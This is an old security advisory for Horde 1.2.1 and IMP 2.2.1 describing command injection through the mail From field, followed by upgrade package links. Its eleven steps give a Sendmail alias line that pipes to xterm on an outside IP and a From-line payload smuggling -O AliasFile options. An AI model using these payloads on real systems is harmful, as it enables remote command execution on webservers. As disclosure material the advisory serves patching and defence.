COMMAND
IMP
SYSTEMS AFFECTED
Horde v1.2.1 & IMP v2.2.1
PROBLEM
Jens Steube found following. The Fix of the first detected
problem with the $from variable in the horde library was just
escaping shellchars which avoids directly executing commands.
It is still possible to exploit the parsed $from line and execute
commands under the uid and gid of the webserver. This has been
tested under Debian 2.2 (potato).
Rxploit is e.g: Horde and IMP, as MTA we use Sendmail (v8.11.0)
0. The job is to send a mail to a address which is defined in an
aliasfile which is manually added to Sendmail. This alias
pipes to a command.
1. Logon to IMP and open a compose window.
2. Locally open a texteditor and write a line in mta-aliasfile
format. After that, save it locally. line e.g:
evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"
3. Upload the local stored file as an attachment.
4. Open the html source-code of the compose-window and search for
'/tmp'.
5. You will find the local stored filename and path of the
attachment on the webserver. Copy it to the Clipboard. Mind:
that filename looks like /tmp/php??????.att
6. Just close the compose window!
7. Open a new compose window.
8. As your FROM-line insert line e.g: (including all quotetypes)
<"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">
9. As your TO-line insert the useralias, which you have defined in
the uploaded attachement.
e.g: evil@localhost
10. Leave all other fields blank and send the mail.
11. Exploited.
Above exploit works out with Sendmail in most configurations, but
other MTAs could also be exploited the same way. Notice that just
disabling of the AliasFile flag is not enough to prevent attacking
this bug because most MTAs also provide other commandswitches to
include external configuration.
SOLUTION
There's an update available which should be a more complete fix.
The Horde team announced the availability of IMP 2.2.2 -- this
version is "part 2" to a security vulnerability present in 2.2.0
(and earlier "pre" releases) that was only partially fixed in
2.2.1. Users of IMP 2.2 on production systems are STRONGLY
ENCOURAGED to upgrade.
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-devel-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-doc-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-devel-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-doc-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm